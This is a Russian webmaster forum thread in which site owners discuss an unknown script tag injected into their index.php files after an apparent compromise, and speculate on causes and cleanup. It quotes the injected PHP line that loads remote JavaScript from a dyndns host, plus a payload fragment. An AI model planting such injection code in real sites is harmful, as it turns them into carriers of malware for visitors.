- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На некоторых своих сайтах только что заметил код внизу страницы после закрытия всех тегов (при открытии исходного кода страницы):
или
Понять не могу что это. При открытии http://stat.dontexist.com/rss.js показывает пустой файл. Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.
При открытии http://stat.dontexist.com/rss.js показывает пустой файл.
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..
Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.
Как правило в зашифрованном виде это дело прописывается
Исправил. Вчера взломали похоже.
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..
Операционка винда + нод32. Как под линуксом то посмотреть его... результат такой же как в винде. FireBug тож результатов не дает. Че за бредовый взлом.
можно в базе поискать, у меня так было. Хитрожопые дописывали скрипты к конец каждой новости. Никак найти не мог)
Возникла мысль.... а не смс баннеры ли таким образом распространяют.
1. Заразили кучу сайтов js файлами
2. пока ниче в нем не прописывают
3. настает время XXX, прописывают туда вредоносный код для загрузки файла с вирусом и вуаля ваши сайты становятся разносчиком заразы :)
Он в конце файла index.php
Столкнулся с такой же ситуацией.
echo '<script src="http://statistic.dyndns.org/rss.js"></script>';
?>
от 134.255.241.125
Вот код
document.getElementById("pftgfkzif").innerHTML = text ;
Занятно, банит, если обращений несколько и при последующих файлы пустые.
Дописался во все индексы сайтов, которые у меня были в закладках файлзиллы, в одном случае похерил весь код. Хостингов (компаний) там было 2, так что похоже от меня (хотя не все сайты я даже открывал)
Кто то вылавливал причину?
5 сайтов на сервере все заражены, этой херней, кто как лечил ? Не могу найти концы, все файлы прочисал, результат 0. Хелп плиз.
Сори тупанул искал в шаблоне , казалось индексный файл в корне лежал.
ПС. Есть мысль что на компе был трой который украл пасы из FileZilla у кого нить еще стоит FileZilla ? Тк у меня не один серв оказался заражен.
5 сайтов на сервере все заражены, этой херней.
Тут от "херни" вряд-ли помогут. Пиши, что говорит антивирус для начала, что делал, чтобы вылечить. Пробовал из бэкапа залить измененные файлы?
Обнаружил кто, как произошло заражение? Просто у меня несколько сайтов были заражены, все они на 1 хостинге (разные аккаунты). Один сайт без CMS и ломать там нечего (даже БД нету).... Я грешу на моего хостера, т.к. однажды его уже ломали и также было массовое заражение.